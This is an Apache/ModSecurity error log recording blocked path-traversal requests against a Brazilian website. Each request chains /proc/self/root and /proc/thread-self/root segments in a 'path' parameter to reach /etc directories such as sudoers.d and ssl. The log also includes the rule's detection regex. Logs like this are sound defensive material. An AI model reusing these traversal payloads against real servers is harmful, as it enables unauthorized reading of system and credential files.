[Wed Mar 18 09:52:40.708982 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:56538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgGNa6ubjKNq_cu4aQAwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:52:45.522171 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:37208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgHSmAPhZkrhU8w4lj7AAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:52:47.317803 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:37218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgHta6ubjKNq_cu4aQBQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:53:04.415455 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:54652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgMMdf6f5d65gmYZTL3wAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:53:14.103398 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:54560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgOuyqAr6etmhZHNq2OAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:53:33.035575 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:37232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgTeoXxyEfFpUF8f9lRgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:53:40.197871 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:57816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgVPu8EFLIOrSqIpv8GQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:53:44.625280 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:59008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgWMdf6f5d65gmYZTMGAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:53:47.147418 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:40942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgW-oXxyEfFpUF8f9lTgAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:53:52.877227 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:40958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgX-yqAr6etmhZHNq2TgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:54:43.588174 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:40548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgk9a6ubjKNq_cu4aQnAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:54:46.199545 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:49882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgltY0UrI5A3LftIycNwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:54:47.507119 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:49886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgl-oXxyEfFpUF8f9laAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:54:57.868360 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:49888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgodY0UrI5A3LftIycQwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:55:02.322717 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:49224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgpOoXxyEfFpUF8f9lcgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:55:05.131131 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:51626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgqeyqAr6etmhZHNq2hAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:55:21.672970 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:43814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqguda6ubjKNq_cu4aQ0AAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:55:27.639393 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:51638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgv8df6f5d65gmYZTMXQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:55:28.208031 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:51638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgwMdf6f5d65gmYZTMXgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:55:29.508138 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:33490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgwUzinOy1jxa1j4cLkAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:55:31.481831 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:43814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgw9a6ubjKNq_cu4aQ2QAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
